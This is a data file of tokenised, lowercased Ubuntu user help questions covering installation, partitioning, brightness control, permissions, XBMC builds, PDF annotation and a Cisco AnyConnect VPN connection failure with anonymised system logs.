484061	e : unable to open debricking	im tryin to install ubuntu touch on my asus tablet memo pad fhd 10 . i followed the instuctions from this link : http : //developer.ubuntu.com/start/ubuntu-for-devices/installing-ubuntu-for-devices/ everything works till this step in chapter : unlock the android device- > $ adb reboot bootloader the i get the error message on the tablet reboot : e : unable to open debricking fastboot init ... fastboot cmd waiting ... can anybody tell me what im doin wrong ? thanks and cheers .
484063	disk partitions are not appearing separately when installing ubuntu along with windows 8.1	i have installed windows 8.1 and now i want to install ubuntu 12.04 along with it and want dual boot os . i have 250 gb hd and they partitioned in four drives in windows and in which one is 20 gb portion for linux which is empty . but when i am installing ubuntu with boot-able pen-drive it shows me three drives one system reserved ( 300 mb ) , one c : drive ( 50 gb ) and other combined drive ( 200 gb ) . this @ this : ~ $ sudo fdisk -l /dev/sda disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x20ed20ec device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs /dev/sda2 * 2048 718847 358400 42 sfs /dev/sda3 718848 104857599 52069376 42 sfs /dev/sda4 104857600 488395119 191768760 42 sfs and this @ this : ~ $ sudo parted /dev/sda print model : ata st3250318as ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 1049kb 1016kb primary ntfs 2 1049kb 368mb 367mb primary ntfs boot 3 368mb 53.7gb 53.3gb primary ntfs 4 53.7gb 250gb 196gb primary
484064	can not change brightness in kde 4.9	so i installed kde on my linux ubuntu 12.04.4 lts kernel 3.11 and i can not use the brightness keys to change the brightness . i can use the echo 20 | sudo tee /sys/class/backlight/acpi_video0/brightness command to do so but how can i change the brightness using the keys ? open to suggestions . : p thakx
484066	bash command completion of command parameters	in fedora 21 , we can type : apt-get ins hit tab , and it will complete the word install we are using an instance of ubuntu 10.04 on a cloud platform , and tab completion works for files , but does not work for command parameters . is there any way to get this to happen on ubuntu 10.04 ? we have to stick for compatibility with software running in this virtual machine .
484071	when booting ubuntu , it states : thinkpad_acpi : unsupported brightness interface	as the title says , when i boot my pc to ubuntu ( 14.04 ) , it says something like this : [ 23.025150 ] thinkpad_acpi : unsupported brightness interface , please contact ibm-acpi-devel @ ... and this confused me , because i 'm not using a thinkpad ( i am using a lenovo ideapad y500 however ) . i was wondering if this thinkpad_acpi should even be installed on my system ? and if not , how can i remove it ? thanks !
484073	what is the 'normal ' cpu temp ?	what is the 'normal ' cpu temp should be ? my cpu temperature normally ( when the system is idle ) remains around 60c and often jumps up to 80c or more . dino @ mika : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +61.0°c ( crit = +99.0°c ) temp2 : +29.8°c ( crit = +99.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +64.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +64.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +57.0°c ( high = +86.0°c , crit = +100.0°c ) dino @ mika : ~ $ **acpi -t** thermal 0 : ok , 29.8 degrees c thermal 1 : active , 62.0 degrees c what are thermal 0 and thermal 1 temperatures here ?
484075	install ubuntu on an external hard disc	not long ago i bought a new pc brand lenovo . i make w7 install because some windows programs interest me and i need them . from the ubuntu website i downloaded 14.04 . lts and i burned on a dvd . now it turns out that i have a mess : when i installed ubuntu i did not think to remove an external drive and ubuntu is distributed between internal and external hard drive . when i start the machine i get grub to choose the operating system i want to open . i thought it would be better to remove ubuntu and install it on a new external drive . what do you think about ? nor do i know how to uninstall ubuntu . thank you .
484078	limit bandwidth for services like wetransfer on ubuntu server gateway	i made some experiments without success , but i do n't know if i made wrong configurations or those services are too `` smart '' ( at least for me ... ) . from this site http : //markmaunder.com/2011/01/26/how-to-reliably-limit-the-amount-of-bandwidth-your-room-mate-or-bad-office-colleague-uses/ i see that some services download data in burst mode , creating some problems in bandwidth shaping . as an example , i do n't see bandwidth usage peaks with tcptrack or similar monotoring software when someone are uploading data with wetrasfer , but i can barely made a `` ping '' during the upload ... i tried to configure my gateway ( ubuntu server pc between router and lan computers ) to limit upload/download bandwidth for each ip ( used tc , trying to use squid with delay pools ) , but without success . any hint for the right tool to use ? could the burst trasmission be really an issue with bandwidth control ? thinking about an application-oriented traffic control , or better , since it is a gateway , a port based traffic control , does anyone know if wetransfer/youtube/spotify use tcp port 80 or something else for data transfer ? thanks ! mix edit : i noticed that another service that drain a lot of upload bandwidth ( all the available bandwidth , it seems ) is icloud backup from iphone devices . i let anyone disable the app during worktime . still , some qos control on the server it 's mandatory .
484079	give a user access rights to a folder	i 've searched on the web for an answer to my issue but what i find just raises more questions . i have installed plexserver on my ubuntu 14.04 . plex ca n't see files or folders from my media library . there is a plex user and a plex group on my system . when i give plex the ownership of my media files ( chown ) everything is fine . but that is not what i want . i just want to give plex read and write rights to my media folder . is this possible with chmod ? if yes how ? if no , then i what is the cleanest way to give plex read and write rights to my media folder ? many thanks for your help .
484080	how to write superscript characters in gedit ?	in gedit , how can i write x^2 without using ^ ? where 2 will be the superscript of x .
484086	trying to install a headless xbmc to ubuntu 12.04	i was trying to follow this guide . i have a vm running ubuntu 12.04 and it currently houses sab+ , nzbdrone , couchpotato and mariadb . i 'm trying to install a headless xbmc so it will be running 24x7 and constantly updated and i do not have to run the update library command from one of the other computers or clients hosting xbmc . so i tried running the following commands sudo apt-get update & & sudo apt-get upgrade -y & & sudo apt-get dist-upgrade -y & & sudo reboot sudo apt-get install python-software-properties software-properties-common sudo add-apt-repository ppa : team-xbmc/unstable sudo add-apt-repository ppa : team-xbmc/xbmc-ppa-build-depends sudo apt-get update sudo apt-get build-dep xbmc and that is where i find a problem . this is the result from the last line . reading package lists ... done building dependency tree reading state information ... done note , selecting 'libglew1.6-dev ' instead of 'libglew-dev' note , selecting 'libsamplerate0-dev ' instead of 'libsamplerate-dev' the following packages have unmet dependencies : libmysqlclient-dev : depends : libmysqlclient18 ( = 5.5.37-0ubuntu0.12.04.1 ) but 10.0.11+maria-1~precise is to be installed e : build-dependencies for xbmc could not be satisfied . any ideas on how to proceed ?
484089	annotating pdfs in evince and then viewing the output in acrobat / adobe products	as i do n't use windows whatsoever and have been a big fan of evince for some time , i was really happy to learn that evince now supports the addition of annotations ( even if it does n't support the deletion of them , which i find odd ) . i have a paper accepted for a journal , and i was sent a type-set copy of the paper for proofing . i was asked to add my corrections directly to the pdf as annotations using adobe commenting tools . i decided to use this opportunity to try out evince for annotation . it seemed to work like a charm , and so i sent off the annotated pdf to the journal . but they are saying it is corrupted and can not be viewed . i imagine they are using the full version of acrobat . i then tried to open the file in acrobat reader -- it gets flagged up as corrupted , just as they say . but it opens fine in evince . anyone know how i can make the output adobe friendly ? has anyone tried annotating pdfs in okular and had the output work with reader ? did you have to do anything special ? thanks ! update : i edited the title to make it more useful to others searching for the same topic .
484090	can we add extra items to gallery of libre office writer	is there any way that we can follow and add extra items into the gallery of libre office office writer . i am currently working on a big project and i want some extra images and icons.doing so with the typical method of copy pasting makes the work lengthy that is the reason for asking this question
484095	how do i remove all desktop-related packages , leaving server only ?	i 've got a vps server , on which i surprisingly find packages like bluez or thunderbird-gnome-support or firefox or libqt4 . do i have to list all the packages like in `` how to delete all desktop environments except unity ? `` ?
484096	setting up vpn connection with cisco anyconnect - the anyconnect package on the secure gateway could not be located	i 'm trying to set up connection via vpn . i need to use cisco anyconnect . first i was getting error cerfitication validation error . then i added certificate ( .pfx format ) through firefox . then when i tried to connect again with anyconnect , it popped me to enter username and password . i entered both username and password , but when i pressed to log in , i got this error : the anyconnect package on the secure gateway could not be located . you may be experiencing network connectivity issues . please try connecting again . i also tried openconnect , i managed to connect with it ( i get response that i successfully connected ) . but when i tried to enter client website , it just start loading and nothing happens . when i tried to ping client 's website , it returns ip only once and stops . what could be the cause ? p.s . my client said that using openconnect , might not let to see website , because of openconnect not knowing what kind of access i got to their site . update my log when connecting via anyconnect ( anynimized info ) : jun 18 16:55:39 user-dell acvpnagent [ 1373 ] : function : loginterfaces file : ../../vpn/agentutilities/routing/interfaceroutemonitorcommon.cpp line : 477 ip address interface list : 111.111.111.111 fe80:0:0:0:868f:69ff : febd:5983 jun 18 16:55:39 user-dell dbus [ 691 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' jun 18 16:55:39 user-dell avahi-daemon [ 799 ] : withdrawing workstation service for vpn0 . jun 18 16:55:39 user-dell networkmanager [ 1042 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/vpn0 , iface : vpn0 ) jun 18 16:55:44 user-dell networkmanager [ 1042 ] : < info > vpn service 'openconnect ' disappeared jun 18 16:55:58 user-dell acvpnui [ 5515 ] : initializing vpnapi version 3.1.03103 ( ) . jun 18 16:55:58 user-dell acvpnui [ 5515 ] : function : loadprofiles file : ../../vpn/api/profilemgr.cpp line : 103 no profile is available . jun 18 16:55:58 user-dell acvpnui [ 5515 ] : function : getcurrentstate file : ../../vpn/api/clientifcbase.cpp line : 2058 api service not ready jun 18 16:55:58 user-dell acvpnui [ 5515 ] : current preference settings : servicedisable : false certificatestoreoverride : false certificatestore : all showpreconnectmessage : false autoconnectonstart : false minimizeonconnect : true locallanaccess : false autoreconnect : true autoupdate : true proxysettings : native allowlocalproxyconnections : true pppexclusion : disable pppexclusionserverip : enablescripting : false terminatescriptonnextevent : false authenticationtimeout : 12 ipprotocolsupport : ipv4 , ipv6 allowmanualhostinput : true blockuntrustedservers : false publicproxyserveraddress : jun 18 16:55:58 user-dell acvpnui [ 5515 ] : function : cvcgtknotifyballoon file : ../../../vpn/gui/linux/cvcgtknotifyballoon.cpp line : 87 invoked function : dlopen return code : -33554427 ( 0xfe000005 ) description : libnotify.so.1 : can not open shared object file : no such file or directory jun 18 16:55:58 user-dell acvpnui [ 5515 ] : function : onnegotiatemessagetypescomplete file : ../../vpn/api/apiipc.cpp line : 726 master agent connection started . jun 18 16:55:59 user-dell acvpnui [ 5515 ] : vpn state : disconnected network state : network accessible network control state : network access : available network type : undefined jun 18 16:55:59 user-dell acvpnui [ 5515 ] : function : setconnectrequestcomplete file : ../../vpn/api/connectmgr.cpp line : 9127 connect request complete . proceeding to cleanup . jun 18 16:55:59 user-dell acvpnui [ 5515 ] : function : activateconnectevent file : ../../vpn/api/connectmgr.cpp line : 1351 null object . can not establish a connection at this time . jun 18 16:55:59 user-dell acvpnui [ 5515 ] : message type information sent to the user : ready to connect . jun 18 16:55:59 user-dell acvpnui [ 5515 ] : function : attach file : ../../vpn/api/clientifcbase.cpp line : 629 client successfully attached . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : an ssl vpn connection to some_host has been requested by the user . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getprofilenamefromhost file : ../../vpn/api/profilemgr.cpp line : 796 no profile available for host some_host jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : gethostinitsettings file : ../../vpn/api/profilemgr.cpp line : 876 profile ( ) not found . using default settings . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : loadprofiles file : ../../vpn/api/profilemgr.cpp line : 103 no profile is available . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getprofilenamefromhost file : ../../vpn/api/profilemgr.cpp line : 796 no profile available for host some_host jun 18 16:56:00 user-dell acvpnui [ 5515 ] : using default preferences . some settings ( e.g . certificate matching ) may not function as expected if a local profile is expected to be used . verify that the selected host is in the server list section of the profile and that the profile is configured on the secure gateway . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getprofilenamefromhost file : ../../vpn/api/profilemgr.cpp line : 796 no profile available for host some_host . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : gethostinitsettings file : ../../vpn/api/profilemgr.cpp line : 876 profile ( ) not found . using default settings . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getcertlist file : ../../vpn/api/apicert.cpp line : 325 number of certificates found : 1 jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : setconnectiondata file : ../../vpn/api/connectmgr.cpp line : 1875 certificate retrieved from preferences : subject name : dc=lt , dc=vlk , dc=vlkad , ou=kiti , ou=kontraktoriai , ou=companies , cn=user issuer name : dc=lt , dc=vlk , dc=vlkad , cn=vlk ca store : firefox jun 18 16:56:00 user-dell acvpnui [ 5515 ] : message type information sent to the user : contacting some_host . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : initiating vpn connection to the secure gateway https : //some_host jun 18 16:56:00 user-dell acvpnagent [ 1373 ] : using default preferences . some settings ( e.g . certificate matching ) may not function as expected if a local profile is expected to be used . verify that the selected host is in the server list section of the profile and that the profile is configured on the secure gateway . jun 18 16:56:00 user-dell acvpnagent [ 1373 ] : function : processconnectnotification file : ../../vpn/agent/mainthread.cpp line : 11423 received connect notification ( host some_host , profile n/a ) jun 18 16:56:00 user-dell acvpnagent [ 1373 ] : function : getsupportedipprotocols file : ../../vpn/api/preferencemgr.cpp line : 231 the endpoint does not fully support ipv6 . ipprotocolsupport value ipv4 , ipv6 is being overridden and only ipv4 will be used . jun 18 16:56:00 user-dell acvpnagent [ 1373 ] : function : logresolutionresult file : ../../vpn/common/utility/hostlocator.cpp line : 913 host some_host has been resolved to ip address 111.111.111.111 jun 18 16:56:00 user-dell acvpnagent [ 1373 ] : writing to hosts file : 111.111.111.111 # 011some_host # # # cisco anyconnect vpn client modified this file . please do not modify contents until this comment is removed . jun 18 16:56:00 user-dell acvpnagent [ 1373 ] : function : respondtoconnectnotification file : ../../vpn/agent/mainthread.cpp line : 4850 the requested vpn connection to some_host will target the following ip protocols and addresses : primary - ipv4 ( address 111.111.111.111 ) , secondary - n/a . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getusername file : ../../vpn/api/ctransportcurlstatic.cpp line : 1928 passwordentry username is user jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : verify_callback file : ../../vpn/commoncrypt/certificates/filecertificate.cpp line : 355 invoked function : x509_verify_cert return code : 0 ( 0x00000000 ) description : ok jun 18 16:56:00 user-dell acvpnui [ 5515 ] : message repeated 2 times : [ function : verify_callback file : ../../vpn/commoncrypt/certificates/filecertificate.cpp line : 355 invoked function : x509_verify_cert return code : 0 ( 0x00000000 ) description : ok ] jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : peercertverifycb file : ../../vpn/api/ctransportcurlstatic.cpp line : 857 return success from verifyservercertificate jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : handleredirects file : ../../vpn/api/connectifc.cpp line : 826 redirecting to : https : //some_host/+webvpn+/index.html jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : setpromptattributes file : ../../vpn/api/connectmgr.cpp line : 4058 the certificate authority is disabled on the secure gateway . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : the following error message was received from the secure gateway : certificate validation failure jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getpreference file : ../../vpn/api/preferenceinfobase.cpp line : 267 invoked function : getpreference return code : 0 ( 0x00000000 ) description : invalid preference 43 jun 18 16:56:00 user-dell acvpnui [ 5515 ] : message repeated 2 times : [ function : getpreference file : ../../vpn/api/preferenceinfobase.cpp line : 267 invoked function : getpreference return code : 0 ( 0x00000000 ) description : invalid preference 43 ] jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : isswenabled file : ../../vpn/api/sdimgr.cpp line : 1027 invoked function : preferencemgr : :getpreference return code : -30343157 ( 0xfe31000b ) description : preferencemgr_error_preference_not_found safewordsoftokenintegration jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : processpromptdata file : ../../vpn/api/sdimgr.cpp line : 336 authentication is not token based ( otp ) . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : nextclientcert file : ../../vpn/api/connectmgr.cpp line : 5193 subject name : dc=lt , dc=vlk , dc=vlkad , ou=kiti , ou=kontraktoriai , ou=companies , cn=user issuer name : dc=lt , dc=vlk , dc=vlkad , cn=vlk ca store : firefox jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getusername file : ../../vpn/api/ctransportcurlstatic.cpp line : 1928 passwordentry username is user jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : verify_callback file : ../../vpn/commoncrypt/certificates/filecertificate.cpp line : 355 invoked function : x509_verify_cert return code : 0 ( 0x00000000 ) description : ok jun 18 16:56:00 user-dell acvpnui [ 5515 ] : message repeated 2 times : [ function : verify_callback file : ../../vpn/commoncrypt/certificates/filecertificate.cpp line : 355 invoked function : x509_verify_cert return code : 0 ( 0x00000000 ) description : ok ] jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : peercertverifycb file : ../../vpn/api/ctransportcurlstatic.cpp line : 857 return success from verifyservercertificate jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getusername file : ../../vpn/api/ctransportcurlstatic.cpp line : 1928 passwordentry username is user jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : setpromptattributes file : ../../vpn/api/connectmgr.cpp line : 4058 the certificate authority is disabled on the secure gateway . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getpreference file : ../../vpn/api/preferenceinfobase.cpp line : 267 invoked function : getpreference return code : 0 ( 0x00000000 ) description : invalid preference 43 jun 18 16:56:00 user-dell acvpnui [ 5515 ] : message repeated 2 times : [ function : getpreference file : ../../vpn/api/preferenceinfobase.cpp line : 267 invoked function : getpreference return code : 0 ( 0x00000000 ) description : invalid preference 43 ] jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : isswenabled file : ../../vpn/api/sdimgr.cpp line : 1027 invoked function : preferencemgr : :getpreference return code : -30343157 ( 0xfe31000b ) description : preferencemgr_error_preference_not_found safewordsoftokenintegration jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : processpromptdata file : ../../vpn/api/sdimgr.cpp line : 336 authentication is not token based ( otp ) . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : getprofilenamefromhost file : ../../vpn/api/profilemgr.cpp line : 796 no profile available for host some_host . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : function : gethostinitsettings file : ../../vpn/api/profilemgr.cpp line : 876 profile ( ) not found . using default settings . jun 18 16:56:00 user-dell acvpnui [ 5515 ] : message type prompt sent to the user : please enter your username and password . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : userresponse file : ../../vpn/api/connectmgr.cpp line : 1316 processing user response . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : send file : ../../vpn/api/connectifc.cpp line : 1061 auth cookie acquired jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : send file : ../../vpn/api/connectifc.cpp line : 1069 config cookie acquired jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : processifcdata file : ../../vpn/api/connectmgr.cpp line : 2878 authentication succeeded jun 18 16:56:22 user-dell acvpnui [ 5515 ] : vpn state : connecting network state : network accessible network control state : network access : available network type : undefined jun 18 16:56:22 user-dell acvpnui [ 5515 ] : message type information sent to the user : establishing vpn session ... jun 18 16:56:22 user-dell acvpnui [ 5515 ] : the group policy on the secure gateway does not have an anyconnect profile configured . though there may one or more local copies of anyconnect profiles , the hardcoded default settings will be used . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : sendrequest file : ../../vpn/api/ctransportcurlstatic.cpp line : 1375 invoked function : curl_easy_perform return code : -30015438 ( 0xfe360032 ) description : ctransport_error_http_returned_error : the http server returned an error code ( > = 400 ) http status code received 404 jun 18 16:56:22 user-dell acvpnui [ 5515 ] : message repeated 2 times : [ function : sendrequest file : ../../vpn/api/ctransportcurlstatic.cpp line : 1375 invoked function : curl_easy_perform return code : -30015438 ( 0xfe360032 ) description : ctransport_error_http_returned_error : the http server returned an error code ( > = 400 ) http status code received 404 ] jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : getpackageurl file : ../../vpn/api/connectifc.cpp line : 2513 redirect encountered after authentication . this indicates the secure gateway did not receive a valid credential . check the security settings in internet explorer ; they may be set too high . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : getupdatefilecontent file : ../../vpn/api/connectifc.cpp line : 1366 unable to locate update file jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : translatestatuscode file : ../../vpn/api/connectifc.cpp line : 2990 invoked function : translatestatuscode return code : -30080998 ( 0xfe35001a ) description : connectifc_error_updatefile_not_found connection attempt failed . please try again . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : usecacheddownloader file : ../../vpn/api/connectmgr.cpp line : 6687 invoked function : connectifc : :getupdatefilecontent return code : -30080998 ( 0xfe35001a ) description : connectifc_error_updatefile_not_found jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : sendrequest file : ../../vpn/api/ctransportcurlstatic.cpp line : 1375 invoked function : curl_easy_perform return code : -30015438 ( 0xfe360032 ) description : ctransport_error_http_returned_error : the http server returned an error code ( > = 400 ) http status code received 404 jun 18 16:56:22 user-dell acvpnui [ 5515 ] : message repeated 2 times : [ function : sendrequest file : ../../vpn/api/ctransportcurlstatic.cpp line : 1375 invoked function : curl_easy_perform return code : -30015438 ( 0xfe360032 ) description : ctransport_error_http_returned_error : the http server returned an error code ( > = 400 ) http status code received 404 ] jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : getpackageurl file : ../../vpn/api/connectifc.cpp line : 2513 redirect encountered after authentication . this indicates the secure gateway did not receive a valid credential . check the security settings in internet explorer ; they may be set too high . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : getdownloader file : ../../vpn/api/connectifc.cpp line : 1243 connectifc : :getpackageurl ( ) is empty , unable to locate downloader jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : translatestatuscode file : ../../vpn/api/connectifc.cpp line : 2990 invoked function : translatestatuscode return code : -30081007 ( 0xfe350011 ) description : connectifc_error_downloader_not_found the anyconnect package on the secure gateway could not be located . you may be experiencing network connectivity issues . please try connecting again . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : launchremotedownloader file : ../../vpn/api/connectmgr.cpp line : 7091 invoked function : connectifc : :getdownloader return code : -30081007 ( 0xfe350011 ) description : connectifc_error_downloader_not_found jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : launchdownloader file : ../../vpn/api/connectmgr.cpp line : 7275 invoked function : connectmgr : :launchremotedownloader return code : -30081007 ( 0xfe350011 ) description : connectifc_error_downloader_not_found jun 18 16:56:22 user-dell acvpnui [ 5515 ] : using default preferences . some settings ( e.g . certificate matching ) may not function as expected if a local profile is expected to be used . verify that the selected host is in the server list section of the profile and that the profile is configured on the secure gateway . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : getprofilenamefromhost file : ../../vpn/api/profilemgr.cpp line : 796 no profile available for host some_host . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : message repeated 2 times : [ function : getprofilenamefromhost file : ../../vpn/api/profilemgr.cpp line : 796 no profile available for host some_host . ] jun 18 16:56:22 user-dell acvpnui [ 5515 ] : function : reloadpreferencesafterupdates file : ../../vpn/api/connectmgr.cpp line : 9314 secure gateway ( some_host ) was not found in profile . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : message type information sent to the user : connection attempt has failed . jun 18 16:56:22 user-dell acvpnui [ 5515 ] : message type error sent to the user : the anyconnect package on the secure gateway could not be located . you may be experiencing network connectivity issues . please try connecting again . log when 'successfully connected via openconnect , but actually ca n't open clients website and ping give response only once ' : jun 18 17:02:31 user-dell dbus [ 691 ] : [ system ] activating service name='org.some_other_domain.hostname1 ' ( using servicehelper ) jun 18 17:02:31 user-dell dbus [ 691 ] : [ system ] successfully activated service 'org.some_other_domain.hostname1' jun 18 17:15:20 user-dell networkmanager [ 1042 ] : < info > starting vpn service 'openconnect ' ... jun 18 17:15:20 user-dell networkmanager [ 1042 ] : < info > vpn service 'openconnect ' started ( org.some_other_domain.networkmanager.openconnect ) , pid 7555 jun 18 17:15:20 user-dell networkmanager [ 1042 ] : < info > vpn service 'openconnect ' appeared ; activating connections jun 18 17:15:25 user-dell acvpnui [ 5515 ] : function : detach file : ../../vpn/api/clientifcbase.cpp line : 438 shutting down vpnapi jun 18 17:15:25 user-dell acvpnagent [ 1373 ] : function : onipcmessagereceived file : ../../vpn/common/ipc/ipcdepot.cpp line : 1047 invoked function : cipctransport : :onsocketreadcomplete return code : -33292279 ( 0xfe040009 ) description : ipctransport_error_unexpected jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > vpn plugin state changed : starting ( 3 ) jun 18 17:15:28 user-dell networkmanager [ 1042 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/vpn0 , iface : vpn0 ) jun 18 17:15:28 user-dell networkmanager [ 1042 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/vpn0 , iface : vpn0 ) : no ifupdown configuration found . jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < warn > /sys/devices/virtual/net/vpn0 : could n't determine device driver ; ignoring ... jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > vpn connection 'something - openconnect ' ( connect ) reply received . jun 18 17:15:28 user-dell openconnect [ 7579 ] : attempting to connect to server 111.111.111.111:443 jun 18 17:15:28 user-dell openconnect [ 7579 ] : ssl negotiation with some_host jun 18 17:15:28 user-dell openconnect [ 7579 ] : connected to https on some_host jun 18 17:15:28 user-dell openconnect [ 7579 ] : got connect response : http/1.1 200 ok jun 18 17:15:28 user-dell openconnect [ 7579 ] : cstp connected . dpd 30 , keepalive 20 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > vpn connection 'something - openconnect ' ( ip config get ) reply received . jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > vpn connection 'something - openconnect ' ( ip4 config get ) reply received . jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > vpn gateway : 111.111.111.111 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > tunnel device : vpn0 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > ipv4 configuration : jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > internal address : 11.11.222.333 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > internal prefix : 20 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > internal point-to-point address : 11.11.222.333 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > maximum segment size ( mss ) : 0 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > static route : 10.10.0.83/32 next hop : 10.10.0.83 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > static route : 10.10.0.64/32 next hop : 10.10.0.64 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > static route : 10.10.0.63/32 next hop : 10.10.0.63 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > forbid default route : yes jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > internal dns : 10.10.0.63 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > internal dns : 10.10.0.64 jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > dns domain : 'domain' jun 18 17:15:28 user-dell networkmanager [ 1042 ] : < info > no ipv6 configuration jun 18 17:15:28 user-dell openconnect [ 7579 ] : connected vpn0 as 11.11.222.333 , using ssl jun 18 17:15:28 user-dell openconnect [ 7579 ] : established dtls connection ( using openssl ) jun 18 17:15:29 user-dell networkmanager [ 1042 ] : < info > vpn connection 'something - openconnect ' ( ip config get ) complete . jun 18 17:15:29 user-dell networkmanager [ 1042 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . jun 18 17:15:29 user-dell acvpnagent [ 1373 ] : a new network interface has been detected . jun 18 17:15:29 user-dell acvpnagent [ 1373 ] : function : loginterfaces file : ../../vpn/agentutilities/routing/interfaceroutemonitorcommon.cpp line : 477 ip address interface list : 111.111.11.54 11.11.222.333 fe80:0:0:0:868f:69ff : febd:5983 jun 18 17:15:29 user-dell networkmanager [ 1042 ] : < info > writing dns information to /sbin/resolvconf jun 18 17:15:29 user-dell dnsmasq [ 1801 ] : setting upstream servers from dbus jun 18 17:15:29 user-dell dnsmasq [ 1801 ] : using nameserver 10.10.0.64 # 53 for domain some-domain jun 18 17:15:29 user-dell dnsmasq [ 1801 ] : using nameserver 10.10.0.64 # 53 for domain domain jun 18 17:15:29 user-dell dnsmasq [ 1801 ] : using nameserver 10.10.0.63 # 53 for domain some-domain jun 18 17:15:29 user-dell dnsmasq [ 1801 ] : using nameserver 10.10.0.63 # 53 for domain domain jun 18 17:15:29 user-dell dnsmasq [ 1801 ] : using nameserver 111.111.11.1 # 53 jun 18 17:15:29 user-dell dbus [ 691 ] : [ system ] activating service name='org.some_other_domain.nm_dispatcher ' ( using servicehelper ) jun 18 17:15:29 user-dell networkmanager [ 1042 ] : < info > vpn plugin state changed : started ( 4 ) jun 18 17:15:29 user-dell dbus [ 691 ] : [ system ] successfully activated service 'org.some_other_domain.nm_dispatcher' jun 18 17:15:29 user-dell networkmanager [ 1042 ] : keyfile : updating /etc/networkmanager/system-connections/vpn connection 1
